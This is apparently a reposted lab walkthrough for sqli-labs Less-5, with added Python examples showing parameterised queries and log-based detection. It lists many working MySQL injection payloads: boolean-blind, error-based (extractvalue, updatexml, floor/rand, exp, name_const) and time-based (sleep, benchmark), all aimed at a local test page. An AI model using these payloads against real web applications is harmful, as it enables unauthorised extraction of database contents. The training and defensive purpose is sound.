Sqli-labs Less-5: Boolean-based blind injection, error-based injection and time-based (delay) injection

Looking at the backend source, we find that when the query returns a row the page only prints "You are in....", and it never returns any data from the database.

$id=$_GET['id'];                                       // untrusted input, used without escaping
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";   // $id is concatenated straight into the query
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
    echo '<font size="5" color="#FFFF00">';
    echo 'You are in...........';                      // only this fixed string is shown, no row data
    echo "<br>";
    echo "</font>";
}
else
{
    echo '<font size="3" color="#FFFF00">';
    print_r(mysql_error());                            // the raw MySQL error is echoed to the page
    echo "</br></font>";
    echo '<font color= "#0000ff" font size= 3>';
}

So the obvious line of thought for this level is blind injection.
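To make the two observations above concrete (the page answers only "row or no row", and the raw database error is echoed), here is an added example that is not part of the original post or of sqli-labs. It rebuilds the Less-5 page logic twice in Python: once with the id string pasted into the SQL exactly as the PHP does, and once with a bound parameter and no error echo. It assumes an in-memory SQLite database instead of MySQL, a constructed users table whose first row is Dumb (the other rows are made up), and SQLite's substr() in place of MySQL's left(); the probe strings TRUE_GUESS and FALSE_GUESS are constructed for the demonstration.

```python
import sqlite3

# Constructed sample rows modelled on the lab's users table (id, username, password).
# Only the "Dumb" row is mentioned on the page; the rest are made up for this example.
SAMPLE_USERS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (3, "Dummy", "p@ssword")]

# Constructed boolean probes in SQLite dialect (substr instead of MySQL's left,
# "--" as the comment terminator). One guess is right, the other is wrong.
TRUE_GUESS = "1' AND substr((SELECT username FROM users WHERE id=1),1,1)='D' --"
FALSE_GUESS = "1' AND substr((SELECT username FROM users WHERE id=1),1,1)='X' --"


def make_db():
    """Build the in-memory database (assumption: SQLite stands in for MySQL)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def page_vulnerable(conn, user_id):
    """Mirrors the Less-5 PHP: the id is concatenated into the SQL string, and the
    page reveals only whether a row came back. A boolean condition appended by the
    client therefore turns the page into a yes/no oracle, and any syntax error is
    reflected to the client (what the error-based payloads later in the post rely on)."""
    sql = f"SELECT * FROM users WHERE id='{user_id}' LIMIT 0,1"
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return f"error: {exc}"          # Less-5 does print_r(mysql_error()) here
    return "You are in..." if row else ""


def page_hardened(conn, user_id):
    """Same page logic with a parameterised query and no error echo. The whole
    input is bound as a single value, so it can never change the query structure:
    a probe string is simply an id that matches nothing."""
    sql = "SELECT * FROM users WHERE id=? LIMIT 0,1"
    try:
        row = conn.execute(sql, (user_id,)).fetchone()
    except sqlite3.Error:
        return ""                       # log server-side; never reflect DB errors
    return "You are in..." if row else ""


def demo():
    """Run the same inputs through both versions and collect what each page shows."""
    conn = make_db()
    return {
        "vuln_normal": page_vulnerable(conn, "1"),
        "vuln_true": page_vulnerable(conn, TRUE_GUESS),    # oracle says "yes"
        "vuln_false": page_vulnerable(conn, FALSE_GUESS),  # oracle says "no"
        "vuln_error": page_vulnerable(conn, "1'"),         # unbalanced quote -> error leaked
        "safe_normal": page_hardened(conn, "1"),
        "safe_true": page_hardened(conn, TRUE_GUESS),      # no row, no signal
        "safe_false": page_hardened(conn, FALSE_GUESS),    # no row, no signal
        "safe_error": page_hardened(conn, "1'"),           # nothing leaked
    }


if __name__ == "__main__":
    for name, shown in demo().items():
        print(f"{name:12s} -> {shown!r}")
```

The point of the comparison is the last four lines of output: with the bound parameter, the right guess and the wrong guess are indistinguishable, so there is no oracle to drive a blind injection with, and the broken-quote input yields nothing a client could read.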

 

1. Trying left(database(),1)

First, look at version()

http://127.0.0.1/sql/Less-5/?id=1' and left(version(),1)='5' %23

This statement checks whether the first character of the version number is 5; obviously the page returns the correct result.

When the guessed version character is wrong, the page does not display "You are in......".

By trying further characters you can work out that the database version number is 5.6.17.

 

Next, look at the length of the database name

http://127.0.0.1/sql/Less-5/?id=1' and length(database())=8 %23

With length 8 the page returns the correct result, which shows the database name is 8 characters long.

 

Guessing the first character of the database name

http://127.0.0.1/sql/Less-5/?id=1' and left(database(),1)>'a'--+

database() is security, so we check whether its first character is > 'a'; clearly 's' > 'a', so the page returns correctly. When we do not know the value, binary search (the dichotomy) can be used to improve injection efficiency.

 

Guessing the second character of the database name

The first character is s; now we check whether the first two characters are greater than 'sa'.

http://127.0.0.1/sql/Less-5/?id=1' and left(database(),2)>'sa'--+

Continuing by analogy, the database is finally found to be called security.

 

2. Trying the substr() and ascii() functions

The tables in the security database are obtained in the following way

http://127.0.0.1/sql/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100--

Here table_schema could be written as ='security', but we use database() because database() is security here. Again, use binary search here until the test succeeds.

Here it should end up as 101, because the first table is email.

 

How to get the second character of the first table name? We have already learned the substr() function: using substr(**, 2, 1) will do.

http://127.0.0.1/sql/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))>108--+

 

How to get the second table? Think about it for a moment!

In the statement above we used limit 0,1. The 0 means start from the beginning and take the first one. To get the second one, just use limit 1,1!

http://127.0.0.1/sql/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))>113--+

Here >113 returns the correct result, because the second table is referers, so its first character is r.

After that the process above is simply repeated; I won't reinvent the wheel here. The principle has been explained clearly.

Once you have run through this method to the end, you can obtain the names of all the tables.

 

3. Using regexp (regular expression) injection to obtain the column names of the users table

The following statement tests whether the users table has a column name beginning with us

http://127.0.0.1/sql/Less-5/?id=1' and 1=(select 1 from information_schema.columns where table_name='users'  and column_name regexp '^us' limit 0,1)--+

http://127.0.0.1/sql/Less-5/?id=1' and 1=(select 1 from information_schema.columns where table_name='users'  and column_name regexp '^username' limit 0,1)--+

You can verify that username exists. We can replace username with other items, such as password, and the result is also correct.

 

4. Using the ord() and mid() functions to obtain the contents of the users table

http://127.0.0.1/sql/Less-5/?id=1' and ord(mid((select ifnull(cast(username as char),0x20) from security.users order by id limit 0,1),1,1))=68--+

Explanation:

(1) cast(username as char) converts username to the char type. Note that this is the cast function (syntax: cast(field_name as type)); when I first wrote it, the result reported a syntax error, and it took several checks before I found the problem.

(2) ifnull(expr1, expr2): if expr1 is not null, ifnull() returns expr1; otherwise it returns expr2.

(3) 0x20 is the hexadecimal representation of the ASCII code for a space.

(4) mid() extracts part of a string: mid(str, start, length) takes length characters of str starting from position start.

(5) ord(), like ascii(), converts a character into its ASCII value.

In summary, this SQL queries the username column of the users table, sorts by id to take the first value, extracts its first character, converts it to its ASCII code and compares it with 68 (the uppercase letter D).

We know the first row of data in the table is Dumb. So what follows is just repeating the same work.

 

Summary: Sections 1, 2, 3 and 4 above use different statements to demonstrate all the payloads of SQL boolean-based blind injection once. Hopefully these examples help you become familiar with, and understand, the statements used in SQL boolean blind injection.

Next, we show error-based injection and time-based (delay) injection.

 

5. Error-based injection

Method 1: error-based injection using the floor() function

http://127.0.0.1/sql/Less-5/?id=1' union Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a--+

Here, select user() can be replaced with any query you construct.

For the principle behind the above, refer to https://www.freebuf.com/articles/web/38315.html and https://www.cnblogs.com/GH-D/p/8274091.html

 

Method 2: error-based injection using a double-type numeric value out of range

http://127.0.0.1/sql/Less-5/?id=1' union select (exp(~(select * from (select user())a))),2,3--+

For the principle, see Sqli-labs Less-14, which uses the exp() function to produce a double value that is out of range and so triggers the error.

 

Method 3: error-based injection using bigint overflow

http://127.0.0.1/sql/Less-5/?id=1' union select (!(select * from (select user())x) - ~0),2,3--+

 

Method 4: error-based injection using the xpath functions

http://127.0.0.1/sql/Less-5/?id=1' and extractvalue(1,concat(0x7e,(select @@version),0x7e))--+

http://127.0.0.1/sql/Less-5/?id=1' and updatexml(1,concat(0x7e,(select @@version),0x7e),1)--+

The principle can be found at: https://blog.csdn.net/zpy1998zpy/article/details/80631036

 

Method 5: error-based injection using duplicated data

http://127.0.0.1/sql/Less-5/?id=1' union select 1,2,3 from (select name_const(version(),1),name_const(version(),1))x --+

 

6. Time-based (delay) injection

Method 1: delay injection using the sleep() function

http://127.0.0.1/sql/Less-5/?id=1'and if(ascii(substr(database(),1,1))=115,1,sleep(5))--+

When the guess is wrong there will be a five second delay.

 

Method 2: delay injection using the benchmark() function

http://127.0.0.1/sql/Less-5/?id=1'UNION SELECT (IF(SUBSTRING(current,1,1)=CHAR(115),BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null)),2,3 FROM (select database() as current) as tb1--+

When the guess is correct, ENCODE('MSG','by 5 seconds') is run 50 million times, which takes some time.

At this point we have demonstrated all the blind injection methods mentioned above once in Less-5. In the following levels only one method will be picked for each demonstration; for the other blind methods please refer back to Less-5.
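Every payload in sections 1 to 6 leaves a recognisable trace in the web server's access log: a quote followed by and, calls to left/substr/ascii/ord/mid/length/regexp, information_schema lookups, extractvalue/updatexml/name_const/floor(rand(...)) for the error-based variants, sleep/benchmark for the delay variants, and a trailing comment terminator (# or --+). The following is an added example, not part of the original post, showing how a defender can spot these from the log side. It assumes Apache combined-format lines with one extra trailing field holding the response time in microseconds (as Apache's %D would log); the log lines, the IP addresses and the timing values are all constructed for this example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined format + response time in microseconds).
# These are made-up entries for the example, not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2020:10:00:01 +0800] "GET /sql/Less-5/?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0" 1200
10.0.0.9 - - [10/Mar/2020:10:00:02 +0800] "GET /sql/Less-5/?id=1%27%20and%20left(version(),1)=%275%27%20%23 HTTP/1.1" 200 512 "-" "curl/7.68" 1400
10.0.0.9 - - [10/Mar/2020:10:00:03 +0800] "GET /sql/Less-5/?id=1%27%20and%20length(database())=8%20%23 HTTP/1.1" 200 512 "-" "curl/7.68" 1300
10.0.0.9 - - [10/Mar/2020:10:00:04 +0800] "GET /sql/Less-5/?id=1%27%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))%3E100--+ HTTP/1.1" 200 512 "-" "curl/7.68" 1500
10.0.0.9 - - [10/Mar/2020:10:00:05 +0800] "GET /sql/Less-5/?id=1%27%20and%20extractvalue(1,concat(0x7e,(select%20@@version),0x7e))--+ HTTP/1.1" 200 640 "-" "curl/7.68" 1100
10.0.0.9 - - [10/Mar/2020:10:00:11 +0800] "GET /sql/Less-5/?id=1%27and%20if(ascii(substr(database(),1,1))=115,1,sleep(5))--+ HTTP/1.1" 200 512 "-" "curl/7.68" 5004120
10.0.0.7 - - [10/Mar/2020:10:00:12 +0800] "GET /sql/Less-5/?id=2 HTTP/1.1" 200 512 "-" "Mozilla/5.0" 1250
"""

# ip, timestamp, method, path, status, response time (microseconds)
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "[^"]*" (\d+)$'
)

# Signatures applied to the URL-decoded query string; each names a technique from the post.
SIGNATURES = {
    "boolean_probe": re.compile(r"'\s*and\s+.*(left|substr|ascii|ord|mid|length|regexp)\s*\(", re.I),
    "schema_enum": re.compile(r"information_schema\.(tables|columns)", re.I),
    "error_based": re.compile(r"\b(extractvalue|updatexml|name_const|floor\(rand\(|exp\(~)", re.I),
    "time_based": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "comment_terminator": re.compile(r"(--|#)\s*$"),   # "--+" decodes to "-- ", "%23" to "#"
}


def analyze(log_text, slow_ms=3000):
    """Tag each request with the signatures it matches and aggregate per client IP.
    A time-based probe that really took >= slow_ms is counted separately, because a
    slow response confirms the injected condition was actually evaluated."""
    per_ip = defaultdict(lambda: {"requests": 0, "tags": set(), "slow_time_based": 0})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _ts, _method, path, _status, micros = m.groups()
        query = unquote_plus(path.partition("?")[2])   # decode %27, %20, %23, "+" -> " "
        tags = {name for name, rx in SIGNATURES.items() if rx.search(query)}
        if not tags:
            continue
        entry = per_ip[ip]
        entry["requests"] += 1
        entry["tags"] |= tags
        if "time_based" in tags and int(micros) / 1000 >= slow_ms:
            entry["slow_time_based"] += 1
    return {ip: {"requests": e["requests"], "tags": sorted(e["tags"]),
                 "slow_time_based": e["slow_time_based"]} for ip, e in per_ip.items()}


def suspicious_hosts(findings, min_requests=3):
    """A blind injection needs many probes, so a burst of tagged requests from one IP,
    any confirmed slow time-based probe, or any error-based signature is worth an alert."""
    return sorted(ip for ip, e in findings.items()
                  if e["requests"] >= min_requests or e["slow_time_based"] or "error_based" in e["tags"])


if __name__ == "__main__":
    found = analyze(SAMPLE_LOG)
    for ip, e in found.items():
        print(ip, e)
    print("alert:", suspicious_hosts(found))
```

Decoding the query string before matching matters: the post's payloads arrive as %27 and %23, so a rule written against the raw request line would miss the quote and the comment terminator. The response-time field is what separates a harmless request that merely contains the word sleep from a time-based probe whose condition was evaluated by the database.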

 

From: https://www.cnblogs.com/lcamry/p/6122257.html


Origin www.cnblogs.com/zhengna/p/12445887.html